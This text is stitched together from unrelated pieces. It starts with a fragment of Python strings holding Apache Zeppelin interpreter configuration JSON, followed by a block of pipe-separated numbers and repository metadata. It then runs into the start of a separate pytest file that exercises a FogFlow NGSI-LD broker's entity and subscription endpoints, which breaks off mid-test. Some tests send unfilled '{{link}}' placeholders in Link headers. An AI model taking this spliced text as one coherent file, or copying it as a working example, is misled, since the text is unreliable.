"interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true\n }, \n "defaultInterpreter": false, \n "name": "angular", \n "class": "org.apache.zeppelin.angular.AngularInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {}, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }\n }, \n "interpreterBindings": {}, \n "interpreterRepositories": [\n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "http://repo1.maven.org/maven2/", \n "repositoryManager": false, \n "type": "default", \n "id": "central"\n }, \n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "file:///home/zeppelin/.m2/repository", \n "repositoryManager": false, \n "type": "default", \n "id": "local"\n }\n ]\n}'
template_after_kerberos = '{\n "interpreterSettings": {\n "2CHS8UYQQ": {\n "status": "READY", \n "group": "sh", \n "name": "sh", \n "id": "2CHS8UYQQ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sh"\n }, \n "defaultInterpreter": false, \n "name": "sh", \n "class": "org.apache.zeppelin.shell.ShellInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "shell.command.timeout.millisecs": "60000", \n "zeppelin.shell.auth.type": "", \n "zeppelin.shell.keytab.location": "", \n "zeppelin.shell.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKAY1A8Y": {\n "status": "READY", \n "group": "md", \n "name": "md", \n "id": "2CKAY1A8Y", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true, \n "language": "markdown"\n }, \n "defaultInterpreter": false, \n "name": "md", \n "class": "org.apache.zeppelin.markdown.Markdown"\n }\n ], \n "dependencies": [], \n "properties": {\n "markdown.parser.type": "markdown4j"\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX8WPU1": {\n "status": "READY", \n "group": "spark", \n "name": "spark", \n "id": "2CKX8WPU1", \n "interpreterGroup": [\n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.spark.SparkInterpreter"\n }, \n {\n "editor": {\n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter"\n }, \n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": false, \n "name": "dep", \n "class": "org.apache.zeppelin.spark.DepInterpreter"\n }, \n {\n "editor": {\n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.spark.PySparkInterpreter"\n }, \n {\n "editor": {\n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "r", \n "class": "org.apache.zeppelin.spark.SparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;", \n "zeppelin.dep.localrepo": "local-repo", \n "zeppelin.spark.useHiveContext": "true", \n "zeppelin.spark.printREPLOutput": "true", \n "spark.yarn.principal": "", \n "zeppelin.R.image.width": "100%", \n "zeppelin.spark.importImplicit": "true", \n "spark.app.name": "Zeppelin", \n "args": "", \n "zeppelin.spark.sql.stacktrace": "false", \n "zeppelin.spark.concurrentSQL": "false", \n "spark.yarn.keytab": "", \n "zeppelin.R.cmd": "R", \n "master": "yarn-client", \n "zeppelin.pyspark.python": "python", \n "zeppelin.R.knitr": "true", \n "zeppelin.R.render.options": "out.format = \'html\', comment = NA, echo = FALSE, results = \'asis\', message = F, warning = F", \n "spark.executor.memory": "512m", \n "zeppelin.spark.maxResult": "1000", \n "spark.cores.max": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CK8A9MEG": {\n "status": "READY", \n "group": "jdbc", \n "name": "jdbc", \n "id": "2CK8A9MEG", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.jdbc.JDBCInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "common.max_count": "1000", \n "zeppelin.jdbc.keytab.location": "", \n "zeppelin.jdbc.concurrent.max_connection": "10", \n "default.user": "gpadmin", \n "zeppelin.jdbc.auth.type": "SIMPLE", \n "default.url": "jdbc:postgresql://localhost:5432/", \n "default.driver": "org.postgresql.Driver", \n "zeppelin.jdbc.concurrent.use": "true", \n "default.password": "", \n "zeppelin.jdbc.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKEKWY8Z": {\n "status": "READY", \n "group": "angular", \n "name": "angular", \n "id": "2CKEKWY8Z", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true\n }, \n "defaultInterpreter": false, \n "name": "angular", \n "class": "org.apache.zeppelin.angular.AngularInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {}, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX6DGQZ": {\n "status": "READY", \n "group": "livy", \n "name": "livy", \n "id": "2CKX6DGQZ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.livy.LivySparkInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.livy.LivySparkSQLInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.livy.LivyPySparkInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark3", \n "class": "org.apache.zeppelin.livy.LivyPySpark3Interpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "sparkr", \n "class": "org.apache.zeppelin.livy.LivySparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "livy.spark.dynamicAllocation.initialExecutors": "", \n "zeppelin.livy.keytab": "", \n "zeppelin.livy.spark.sql.maxResult": "1000", \n "livy.spark.executor.instances": "", \n "livy.spark.driver.memory": "", \n "livy.spark.executor.memory": "", \n "livy.spark.dynamicAllocation.enabled": "", \n "livy.spark.dynamicAllocation.cachedExecutorIdleTimeout": "", \n "livy.spark.driver.cores": "", \n "zeppelin.livy.session.create_timeout": "120", \n "zeppelin.livy.principal": "", \n "livy.spark.jars.packages": "", \n "livy.spark.dynamicAllocation.maxExecutors": "", \n "zeppelin.livy.concurrentSQL": "false", \n "zeppelin.livy.displayAppInfo": "false", \n "livy.spark.dynamicAllocation.minExecutors": "", \n "zeppelin.livy.url": "http://localhost:8998", \n "zeppelin.livy.spark.sql.field.truncate": "true", \n "zeppelin.livy.pull_status.interval.millis": "1000", \n "livy.spark.executor.cores": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "scoped", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }\n }, \n "interpreterBindings": {}, \n "interpreterRepositories": [\n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "http://repo1.maven.org/maven2/", \n "repositoryManager": false, \n "type": "default", \n "id": "central"\n }, \n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "file:///home/zeppelin/.m2/repository", \n "repositoryManager": false, \n "type": "default", \n "id": "local"\n }\n ]\n}'
| 1,638.407407
| 15,625
| 0.503086
| 4,436
| 44,237
| 5.010144
| 0.058611
| 0.028796
| 0.016198
| 0.04252
| 0.941417
| 0.932193
| 0.915006
| 0.900427
| 0.870281
| 0.837885
| 0
| 0.012766
| 0.30054
| 44,237
| 27
| 15,626
| 1,638.407407
| 0.705514
| 0.017474
| 0
| 0
| 0
| 2
| 0.996019
| 0.250736
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
|
0
| 13
|
5d1f292aebcc1d9924a7325053e7b1d32b8a90fc
| 50,190
|
py
|
Python
|
test/UnitTest/NGSI-LD/test_casesNGSI-LD.py
|
jason-fox/fogflow
|
e396ef0dee0125936954e381ab2862fd472e1774
|
[
"BSD-3-Clause"
] | null | null | null |
test/UnitTest/NGSI-LD/test_casesNGSI-LD.py
|
jason-fox/fogflow
|
e396ef0dee0125936954e381ab2862fd472e1774
|
[
"BSD-3-Clause"
] | null | null | null |
test/UnitTest/NGSI-LD/test_casesNGSI-LD.py
|
jason-fox/fogflow
|
e396ef0dee0125936954e381ab2862fd472e1774
|
[
"BSD-3-Clause"
] | null | null | null |
import os,sys
# change the path accoring to the test folder in system
from datetime import datetime
import copy
import json
import requests
import time
import pytest
import ld_data
import sys
# change it by broker ip and port
brokerIp="http://localhost:8070"
discoveryIp="http://localhost:8090"
print("Testing of NGSI-LD")
# testCase 1
'''
To test create entity with context in Link Header
'''
def test_case1():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata1),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 2
'''
To test create entity with context in payload
'''
def test_case2():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata2),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 3
'''
To test create entity with context in Link header and request payload is already expanded
'''
def test_case3():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata3),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 4
'''
To test to append additional attributes to an existing entity
'''
def test_case4():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json', 'Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata4),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 5
'''
To test to update specific attributes of an existing entity A100
'''
def test_case5():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata5),headers=headers)
print(r.status_code)
assert r.status_code == 201
#testCase 6
'''
To test to update the value of a specific attribute of an existing entity with wrong payload
'''
def test_case6():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json'}
r=requests.post(url,data=json.dumps(ld_data.subdata6),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 400
#testCase 7
'''
To test create entity without passing Header
'''
def test_case7():
url=brokerIp+"/ngsi-ld/v1/entities/"
r=requests.post(url,data=json.dumps(ld_data.subdata13))
print(r.content)
print(r.status_code)
assert r.status_code == 400
#testCase 8
'''
To test create entity without passing Link Header
'''
def test_case8():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 9
'''
To test Update entity with two header namely Content Type and Accept header and posting duplicate attribute
'''
def test_case9():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata14),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 10
'''
To test Update entity with wrong id format
'''
def test_case10():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata14b),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 400
#testCase 11
'''
To test Update entity with wrong id format and not passing Accept Header
'''
def test_case11():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json'}
r=requests.post(url,data=json.dumps(ld_data.subdata14b),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 400
#testCase 12
'''
To test Update entity with three header namely Content-Type, Accept and context Link
'''
def test_case12():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata14),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 13
'''
To test Update entity with different headers namely Content-Type, Accept and context Link and passing inappropriate payload
'''
def test_case13():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata15),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 500
#testCase 14
'''
To test Update entity without header
'''
def test_case14():
url=brokerIp+"/ngsi-ld/v1/entities/"
r=requests.post(url,data=json.dumps(ld_data.subdata14))
print(r.content)
print(r.status_code)
assert r.status_code == 400
#testCase 15
'''
To test to update entity by first creating entity without corresponding attribute
'''
def test_case15():
#create NGSI-LD entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata16),headers=headers)
print(r.content)
print(r.status_code)
#update the corresponding entity using post
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata14c),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 16
'''
To test to update entity by first creating entity with all attributes missing
'''
def test_case16():
#create NGSI-LD entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata17),headers=headers)
#print(r.content)
#print(r.status_code)
#update the corresponding entity using post
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata14d),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 201
#testCase 17
'''
To test to delete NGSI-LD context entity
'''
def test_17():
#create NGSI-LD entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata32),headers=headers)
#print(r.content)
#print(r.status_code)
#to delete corresponding entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A999"
headers={'Content-Type':'application/json','Accept':'application/ld+json'}
r=requests.delete(url,headers=headers)
#print(r.status_code)
assert r.status_code == 204
#testCase 18
'''
To test to delete an attribute of an NGSI-LD context entity
'''
def test_case18():
#create NGSI-LD entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata11),headers=headers)
print(r.content)
#print(r.status_code)
#to append the attribute of corresponding entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata4b),headers=headers)
print(r.content)
#print(r.status_code)
#to delete the attribute of corresponding entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A500/attrs/brandName1"
r=requests.delete(url)
#print(r.status_code)
assert r.status_code == 204
#testCase 19
'''
To test to delete an attribute of an NGSI-LD context entity which does not have any attribute
'''
def test_case19():
#create NGSI-LD entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata18),headers=headers)
#print(r.content)
#print(r.status_code)
#to delete attribute of corresponding entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A501/attrs/brandName1"
r=requests.delete(url)
print(r.content)
#print(r.status_code)
assert r.status_code == 404
#testCase 20
'''
To test to retrieve a specific entity which is deleted
'''
def test_case20():
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A999"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 404
#testCase 21
'''
To test to retrieve a specific entity which is existing
'''
def test_case21():
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A4580"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Vehicle:A4580":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 22
'''
To test to retrieve entities by attributes
'''
def test_case22():
url=brokerIp+"/ngsi-ld/v1/entities?attrs=http://example.org/vehicle/brandName"
headers={'Content-Type':'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["http://example.org/vehicle/brandName"]["value"]=="Mercedes":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 23
'''
To test to retrieve entities by attributes with wrong query
'''
def test_case23():
url=brokerIp+"/ngsi-ld/v1/entities?attrs"
headers={'Content-Type':'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 24
'''
To test to retrieve a specific entity by ID and Type
'''
def test_case24():
url=brokerIp+"/ngsi-ld/v1/entities?id=urn:ngsi-ld:Vehicle:A4580&type=http://example.org/vehicle/Vehicle"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["type"]=="http://example.org/vehicle/Vehicle" and resp[0]["id"]=="urn:ngsi-ld:Vehicle:A4580":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 25
'''
To test to retrieve a specific entity by Type
'''
def test_case25():
url=brokerIp+"/ngsi-ld/v1/entities?type=http://example.org/vehicle/Vehicle"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["type"]=="http://example.org/vehicle/Vehicle":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 26
'''
To test to retrieve a specific entity by Type with wrong query
'''
def test_case26():
url=brokerIp+"/ngsi-ld/v1/entities?type=http://example.org"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 404
#testCase 27
'''
To test to retrieve entities by Type, with context in Link Header
'''
def test_case27():
url=brokerIp+"/ngsi-ld/v1/entities?type=Vehicle"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["type"]=="Vehicle":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 28
'''
To test to retrieve a specific entity by Type, context in Link Header and wrong query
'''
def test_case28():
url=brokerIp+"/ngsi-ld/v1/entities?type"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 29
'''
To test to To retrieve a specific entity by IdPattern and Type
'''
def test_case29():
url=brokerIp+"/ngsi-ld/v1/entities?idPattern=urn:ngsi-ld:Vehicle:A.*&type=http://example.org/vehicle/Vehicle"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["type"]=="http://example.org/vehicle/Vehicle" and resp[0]["id"].find("A")!=-1:
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 30
'''
To test to retrieve an entity registered over Discovery
'''
def test_case30():
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A4580"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["ID"]=="urn:ngsi-ld:Vehicle:A4580":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 31
'''
To test to create a new Subscription to with context in Link header
'''
def test_case31():
#create subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata10),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 201
#testCase 32
'''
To test to retrieve all the subscriptions
'''
def test_case32():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Accept' : 'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 200
#testCase 33
'''
To test to retrieve a specific subscription based on subscription id
'''
def test_case33():
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Subscription:7":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 34
'''
To test to update a specific subscription based on subscription id, with context in Link header
'''
def test_case34():
#get subscription before update
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
#Update the subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Content-Type':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.patch(url,data=json.dumps(ld_data.subdata12),headers=headers)
#print(r.content)
#print(r.status_code)
#get subscription after update
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Subscription:7":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 35
'''
To test to update a specific subscription based on subscription id, without header
'''
def test_case35():
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
r=requests.patch(url,data=json.dumps(ld_data.subdata12))
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 36
'''
To test to update a specific subscription based on subscription id, with context in Link header and different payload
'''
def test_case36():
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Content-Type':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.patch(url,data=json.dumps(ld_data.subdata20),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 204
#testCase 37
'''
To test to delete a specific subscription based on subscription id
'''
def test_case37():
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
r=requests.delete(url)
#print(r.status_code)
assert r.status_code == 204
#testCase 38
'''
To test for empty payload in entity creation
'''
def test_case38():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata26),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 39
'''
To test for empty payload in subscription
'''
def test_case39():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata26),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 40
'''
To test for ModifiedAt and CreatedAt in entity creation
'''
def test_case40():
#Entity Creation
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata27),headers=headers)
#print(r.content)
#print(r.status_code)
#Fetching Entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A6000"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Vehicle:A6000":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 41
'''
To test for ModifiedAt and CreatedAt in susbcription
'''
def test_case41():
#create subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
